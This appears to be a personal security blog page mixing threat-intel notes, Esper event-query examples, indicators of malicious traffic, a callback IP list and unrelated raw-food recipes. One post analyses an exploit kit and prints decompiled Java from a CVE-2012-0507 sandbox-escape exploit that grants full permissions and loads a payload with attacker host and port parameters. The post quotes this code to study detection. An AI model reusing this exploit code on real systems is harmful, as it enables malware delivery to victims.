-
Join 140 other subscribers
Categories
Blogroll
- App Sec SANS Blog
- Chat Messenger
- Chrissanders Incident response
- CiteSeerX Technical Document Search
- Complete Excercise Bible
- Complete Security at One eYe
- Contagiodump (Malware Analysis Blog)
- Core Security Technologies event and Webcast
- Derkeiler Security, Perl Usernet Group
- Infosec Institute Resources
- Irongeek – Infosec blog
- Movie List
- Security Blogs List
- Spot the Vulnerability
Cooking
Forums
Resources
- 20 Critical Security Controls
- 8 Week Fatburn workout
- CERT Virtual Training Environment (VTE)
- Comparision of WebApp Scanners
- Cryptography and Network Security
- Cubase Video Tuts
- Ethical Hacking Course
- Eureka Malware Analysis
- Exploring Splunk
- Forensics Puzzle
- Google Hacking Database (GHDB)
- Hex Base64 Binary Translator
- Huge Respository of Hacking Tools
- Information Risk Executive Council
- Javascript Unpacker
- Malware Analysis Tools
- Nirsoft Softwares – Collection simple useful utilities
- Opensource Tools for Forensic Analysis
- OS Internals and Windows Case Presentations
- PCI Compliance Dashboard
- Reverse Engineering – Complete Tutorial
- SAMATE – Software Assurance
- Secure Design Solution Using Intrusion Prevention Systems
- Security Audit Resources
- Security Cheat Sheets
- Security Database Tools
- Security Papers
- Ultimate Reconnoissance
Pages
Tags
- abs
- analysis
- approach
- arp exploit
- a to z
- body purification
- botnet
- botnet takeover
- bypass firewall
- bypass hotspot authentication
- camera
- command and control server
- computer forensics
- computer programming
- computer technologies
- defense
- detox
- detoxification
- distributed systems
- distributed systems security
- domain fluxing
- ebook
- ebooks
- exploit
- fat
- firewall restrictions
- health
- hi resolution camera
- image
- javascript
- layered tools
- learn
- learn web application security
- mac spoofing
- malicious script
- malware
- malware analysis
- memorize
- memory analysis
- metasploit
- notes
- olive oil
- openssh
- packet crafting
- pen test
- pentest
- perl
- php
- putty
- reduce fat
- remove fat
- resize
- rootkit
- scapy
- secure coding
- security
- security issues
- six packs
- slim
- slimtips
- stackoverflow
- tools
- torpig
- triceps
- tutorial
- use homepc
- video streaming
- volatility
- vulnerability
- webapp security
- web developemnt
- where to start security
- Workout
- xml
- zeroaccess
Threat Intel Program – Quick Reference
Cyber Attack Taxonomy
Threat Intel Taxonomy
Threat Intel Classification
Strategic |
Operational |
Tactical |
|
|
|
Threat Intel vs Cyber Attacks
Adversaries vs Targets
US TRADOC Cyber Operations Model – Sample
Threat Intel Program Checklist
https://intel471.com/threatintelprogramchecklist.pdf
- Biannual process in place to derive, update and capture prioritized intelligence requirements (PIRs) that map to your organization’s business risks.
- Tracking of ad hoc requirements that meet and do not meet standing PIRs in order to identify emerging intelligence needs and requirements.
- Documented intelligence production requirements.
- Documented collection requirements.
- Documented mapping of collection requirements to internal teams/capabilities or external (intelligence) providers/vendors (guidance).
- Regular assessment and tracking of guidance versus output from internal capabilities and external (intelligence) providers/vendors (collection management).
- Intelligence collection is easily consumable, i.e. in a threat intelligence platform (TIP).
- Documented intelligence production style guide.
- Documented intelligence review and editing process.
- Formalized intelligence product style and templates.
- Intelligence products include future predictions and doesn’t just report on facts.
- Sources used in intelligence products are linked to the relevant source and graded.
- Knowledge gaps are identified in intelligence products and pushed back into the requirements part of the intelligence cycle.
- Feedback is received from your intelligence consumer/customer and used to drive further intelligence collection and production if needed.
- Key Performance Indicators (KPIs) are generated for the intelligence program.
- KPIs are generated for each part of the intelligence cycle including for internal and external sources of finished intelligence products and intelligence collection.
- Have an intelligence (collection) management function that tracks and prioritizes requirements and tasks them as assigned guidance.
References/Additional Resources
- Threat Intel Program Checklist
- Definitive Guide to Cyber Threat Intelligence
- SANS – Defining Threat Intelligence Requirements
- Lockheed Martin – Threat Driven Approach
- Ten Strategies of World-Class SOC, Chapter 11: Be a Sophisticated Consumer and Producer of Cyber Threat Intelligence (2014)
- Threat Intelligence and the Paradigm Shift in Cyber Defense – Neal Rothleader
- Intelligence-Driven Security: A New Model using Big Data – RSA
- Introduction: Recorded Future Cyber threat intelligence Application
- https://www.ncsc.gov.uk/content/files/protected_files/guidance_files/MWR_Threat_Intelligence_whitepaper-2015.pdf
- Securosis – Building a Threat Intelligence Program (May 2016)
Posted in Resources, security, Security Management
Leave a comment
Intro to Event Stream Analysis (ESA) & Complex Event Processing (ESPER)
Exploring Event Driven Architectures with Esper
https://www.infoq.com/news/2007/05/esper
- Event stream processing (ESP)
- monitors streams of event data, analyzing those events for matching conditions and then notifies listeners
- Complex event processing (CEP)
- allows the detection of patterns among events
WHAT IS COMPLEX EVENT PROCESSING (CEP)?
Complex Event Processing (CEP), or Event Stream Stream Processing (ESP) are technologies commonly used in Event-Driven systems. These type of systems consume, and react to a stream of event data in real time. Typically these will be things like financial trading, fraud identification and process monitoring systems – where you need to identify, make sense of, and react quickly to emerging patterns in a stream of data events.
KEY COMPONENTS OF A CEP SYSTEM
A CEP system is like your typical database model turned upside down. Whereas a typical database stores data, and runs queries against the data, a CEP data stores queries, and runs data through the queries.
To do this it basically needs:
- Data – in the form of ‘Events’
- Queries – using EPL (‘Event Processing Language’)
- Listeners – code that ‘does something’ if the queries return results
The Esper query language provides a rich syntax allowing complex temporal logic to be expressed, and includes features such as:
- Event filtering
- Sliding window and aggregation (count all assets reported in the last 30 seconds)
- Grouped windows and output rate limiting (get a count per zone of the last 10 minutes per zone)
- Joins and outer joins (also joins between event streams)
- Integration with historic or reference data (accessing relational databases)
- Creation of virtual streams that all statements can access
References
- Introduction to EQL and Patterns
http://www.onjava.com/pub/a/onjava/2007/03/07/esper-event-stream-processing-and-correlation.html?page=2 - CEP Example
http://corsoftlimited.blogspot.co.uk/2013/02/complex-event-processing-made-easy.html
Examples
- Esper EQL is an object-oriented event stream query language very similar to SQL in its syntax but that significantly differs to be able to deal with sliding window of streams of data.
- Esper also includes a pattern language that provides for stateful (state-machine) event pattern matching.
- EQL and patterns can be used alone or can also be combined to express complex temporal logic.
Example 1: Terminal Monitoring/Alerting
Events are as below
BaseTerminalEvent (Super Event)
- Checkin, Completed, Cancelled, Status, OutOfOrder, LowPaper (Inherited Events)
select * from LowPaper |
Report when you observe an LowPaper Event |
select * from LowPaper select * from OutOfOrder |
Report when you observe an LowPaper Event Report when you observe an OutOfOrder Event |
select a,b from pattern
|
Report when you observe an LowPaper Event Report when you observe an OutOfOrder Event |
select * from BaseTerminalEvent where type = 'LowPaper' or type = 'OutOfOrder' |
Report when you observe an LowPaper Event Report when you observe an OutOfOrder Event |
select 'terminal 1 is offline' from pattern [ every timer:interval(60 sec) -> (timer:interval(65 sec) and not Status(term.id = 'T1'))
|
Detecting the Absence of Status Events
Repeat the action for every 60 seconds
|
select count(*) from Checkin.win:time(10 minutes) |
Report number of Checkin Events during a window of 10 minutes |
select type, count(*) from BaseTerminalEvent.win:time(10 minutes) group by type output all every 1 minutes |
For a window of last 10 minutes for BaseTerminalEvent
Alert every 1 minute and not at each change |
Example 2: Tweets Monitoring (https://www.igvita.com/2011/05/27/streamsql-event-processing-with-esper/)
SELECT sum(retweets) from TweetEvent
|
find the sum of retweets of last 5 tweets which saw more than 10 retweets
|
SELECT timezone, sum(retweets) from TweetEvent.win:time_batch(10 sec) group by timezone |
number of retweets, grouped by timezone, buffered in 10 second increments |
SELECT sum(retweets) from TweetEvent.win:time(60 sec) output snapshot every 30 events |
Report the sum of retweets for TweetEvent s of sliding 60 second window, and emit count every 30 events |
SELECT timezone, sum(retweets)
|
Report total number of retweets by timezone for TweetEvent s of batch of 10 second window where the window of TweetEvents grouped by timezone and report if each window of events has total retweets > 10 |
side notes
Checkin.win:time(10 minutes) |
This tells the engine to consider a time window consisting of
only the last 10 minutes of the Checkin event stream. |
TweetEvent.win:time_batch(10 sec) |
buffered in 10 second increments
|
output first every 5 minutes |
Alert first time when pattern matched and suppress for next 5 minutes |
output all every 1 minutes |
Alert every 1 minute and not at each change |
output snapshot every 30 events |
Alert every 30 events that matched the pattern |
Status(term.id = 'T1') |
Status Event where term.id = ‘T1’ |
Posted in Uncategorized
Leave a comment
Artifacts of a Malicious Traffic
While Investigating the Suspicious Traffic, it is important for an analyst to be clear what is really suspicious or not.
Below are few artifacts an analyst can observe to conclude if it is malicious or not.
ARTIFACTS OF MALICIOUS IP
1) IP belong to High Risk Hosting Provider / Internet User IP
2) Has Malicious References on sites such as Sophos.com, mcafee.com,urlquery.net,snort.org,threatexpert.org,virustotal.com, malwr.org, xml.sandbox.net etc.,
ARTIFACTS OF MALICIOUS DOMAIN
If at least three of below criteria is matched, the domain would be malicious
1) Domain is NOT Popular
2) Has Malicious References on sites such as Sophos.com, mcafee.com,urlquery.net,snort.org,threatexpert.org,virustotal.com, malwr.org, xml.sandbox.net etc.,
3) Domain created date is less than 1 Year
4) Bluecoat Category is none / Suspicious / Malicious sources / Malicious Botnets / Dynamic DNS Hosts
5) No Site description
ARTIFACTS OF MALICIOUS WEB HEADER
1) User-Agent Field gives the idea what Is the application
Some malwares uses UA that appears legitimate, Hence check the UA used in other traffic for that IP at the same time
Some Malware uses exact UA that browser on infected machine uses, In that case check the header for other fields as described below to confirm if the web request is made by Browser/Malware.
2) Below fields in the Header indicate the request is made by a browser .
If they are not present, mostly the request is made by some malware/application
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
…
Cache-Control: max-stale=0
Pragma: no-cache
Connection: Keep-Alive
3) Referrer Field gives the Clue from where the user was redirected to
After confirming that Web Request is made by Browser,
If Referrer field is available,
a) If Referrer URL is yahoomail.com/live.com/gmail.com – indicating user infected from Phishing/SPAM
b) If Referrer URL is good blog/forum – indicating user infected from compromised site
If Referrer field is unavailable – User might have been Phished/SPAMed . (User clicking link from email in outlook)
Callback IP List – 16/8/2012
76.89.34.249
72.64.7.218
180.252.254.254
68.11.109.233
129.219.58.25
78.137.161.116
50.81.200.245
173.19.2.108
207.255.241.104
173.30.234.10
208.157.180.50
72.188.70.228
66.55.89.150
201.51.3.12
112.121.178.189
2.180.53.52
108.162.40.50
78.21.199.217
94.249.188.62
72.218.128.8
68.169.130.253
99.250.220.29
151.25.5.119
88.254.254.254
88.253.254.254
74.194.104.238
87.97.119.9
72.213.131.9
1.83.113.212
99.66.12.13
173.216.128.155
83.249.254.254
75.133.57.195
117.254.254.254
74.219.99.6
98.124.25.14
178.202.35.2
93.184.100.116
87.29.249.57
85.197.78.132
95.252.254.254
72.184.62.10
75.254.254.254
211.133.212.24
98.28.19.232
66.55.89.151
91.217.162.127
24.149.99.210
101.62.103.183
80.241.255.250
209.20.78.241
72.195.180.4
94.87.149.237
180.254.54.24
88.231.50.39
166.241.196.245
203.130.129.58
75.31.80.44
66.69.153.23
65.25.182.4
114.112.53.236
184.160.38.195
195.210.47.109
173.21.193.44
114.202.247.182
77.81.225.253
146.185.255.194
64.207.75.5
65.26.230.204
125.214.75.185
197.253.254.254
98.155.210.211
67.84.56.7
173.29.245.12
98.142.19.14
201.167.9.175
1.254.254.254
66.75.229.201
91.62.38.21
12.232.108.243
69.146.1.218
115.84.185.25
42.201.148.6
201.250.254.254
97.100.132.19
109.121.197.5
190.253.254.254
67.240.187.215
88.252.254.254
94.253.254.254
24.89.93.11
ZeroAccess/Siresef Update
Until last week ZeroAccess/Siresef Infected hosts contacting C&C domain on ports 16464, 16465, 16470 and 16471.
Currently it switched to port 34354 is now going on wild.
Watch out your network for machines going on to internet ips on this port
New Mode of delivering Malware Payload by Exploit Kits
Huh… Exploit writers have come up with new mode of delivering malware payload.
The current pattern of exploit kit is malicious webpage -> Exploit (Java/PDF/others) -> Exploits download the malicious executable.
we have devised appropriate signatures for these patterns, malware authors has come up with new mode of delivering malware payload.
They are embedding malware payload as HEX in the malicious webpage and passing it as a parameter to the exploit.
The exploit bypasses security controls and writes the HEX as the file and runs on the victim system.
Malicious Webpage that triggering Exploit Applet, The param, converted to binary and XOR’d with 0x77, retunes an EXE
<param name="data" value="3A2DE777747777777377777788887777CF777777777777773777777…
Code that reads the Malware Payload Content
try { ConfusingClassLoader confusingclassloader = confuser.confuse(getClass().getClassLoader()); String as[] = { "m.y.py", "m.y.py$pr" }; String as1[] = { "/m/y/py.class", "/m/y/py$pr.class" }; String s = getParameter("lport"); ConfusingClassLoader.defineAndCreate(confusingclassloader, as, new byte[][] { loadClass(as1[0]), loadClass(as1[1]) }, getParameter("data"), getParameter("jar"), getParameter("lhost"), s != null ? Integer.parseInt(s) : 4444); }
Exploit code (Java/CVE-2012-0507) that bypasses security restrictions
public static void defineAndCreate(ConfusingClassLoader confusingclassloader, String as[], byte abyte0[][], String s, String s1, String s2, int i) { try { Permissions permissions = new Permissions(); permissions.add(new AllPermission()); ProtectionDomain protectiondomain = new ProtectionDomain(new CodeSource(null, new Certificate[0]), permissions); Class class1 = confusingclassloader.defineClass(as[0], abyte0[0], 0, abyte0[0].length, protectiondomain); confusingclassloader.defineClass(as[1], abyte0[1], 0, abyte0[1].length, protectiondomain); Field field = class1.getField("data"); Field field1 = class1.getField("jar"); Field field2 = class1.getField("lhost"); Field field3 = class1.getField("lport"); field.set(null, s); field1.set(null, s1); field2.set(null, s2); field3.set(null, Integer.valueOf(i)); class1.newInstance(); }
Code that writes the content to file
try
{
bufferedreader = new BufferedReader(new InputStreamReader(is));
bufferedwriter = new BufferedWriter(new OutputStreamWriter(os));
char ac[] = new char[8192];
int i;
while((i = bufferedreader.read(ac, 0, ac.length)) > 0)
{
bufferedwriter.write(ac, 0, i);
bufferedwriter.flush();
}
}
Just scratching my head how to detect it?
#exploit, #javacve-2012-0507, #malware-payload-delivery
Raw Food recipes from Life Regenerator Dan
(http://www.regenerateyourlife.org/)
Notes Compiled by Uma Mahesh
- Almond Coconut Yogurt
Blend
Mung Bean Salad
Salad
Sprouted Mung beans + kottimera + tomato + onions
Salad Dressing
Olive Oil + Orange Juice + Sea Salt
Spicy Cabbage Almond Salad
Salad
Cabbage + Almond
Salad Dressing
Apple Cider Vinegar + Honey + Garlic Powder
+ Pandu Mirapakai Karam + Saindhava Lavanam
Seseme tahini
Salad Dips
Blend
1 cup Sesame seeds + 4 cloves of garlic + Zucchini +
Dates + Lemon (/Orange) + Water(/Coconut water)
Salad
Carrot , Broccoli, Calliflower, any veggie
Coconut Almond Yogurt & Avacado Dressing
Salad Dressing
Blend
Basil/kottimera (Any herb) +
Coconut Almond Yogurt +
Dates +Garlic Cloves + Saindava Lavanam)
+ Pandu Mirapa (If required hot)
Salad
Lettuce (Any Leafy Veggie) + Sprouts + Onion + Cucumber
Raw Tacos
Cilantra -> Kottimira
Salad Base (Taco Meat)
Blend
Walnutes + Cumin + Paprika + Sea Salt
Salad Cheese
Sprouted pumpkin seeds + Nutritional Yeast
Gaucamole Salad
Salad Dressing
Crush
(Tomatos + Onions + Garlic + Chili + Kottimera)
+ Avacado + Corn
Salad
Zucchini slices
Butternut Squash Pasta
Blend (Squash Pasta)
Tomatos ( + Sun Dried Tomatoes) + Kottimira + Olive oil
+ lemon + garlic + sea salt + oregano + (All Herb Powders)
Salad
Gummadikayi noodles (Shredder (gummadikai) )
Mango Dill Jalapeno Dressing
Blend (Dips)
Mangoes + Mint Leaves + Pachimirapakai
Salad
Romaine Lettuce
Butternut Squash Pudding
Blend
Pumpkin + Coconot almond yogurt + protein powder + cinnamon
Business case to convince Management for Security Incident Response center
Today i am reading through mandiant document named ‘Planning for Failure”. It contains real data that emphasizes on breaches and necessity to plan for failure to protect. For any company or security consultancy that real data can be used for business case for getting budget for security. Hence i am including that document here.
This document can also be helpful to CISO to show to management and startup guidelines to initiate building up Incident Response Center.
http://fred.mandiant.com/planning_for_failure.pdf
PCI Compliance Dashboard guiding PCI Compliance journey
A well composed guide for PCI Compliance,
it includes “SANS Top 20 Critical Security Controls” and many others.
It helps giving simple and clear guidelines for ensuring security for any organization irrespective of PCI compliance mandate.
It can be downloaded from https://community.rapid7.com/docs/DOC-1512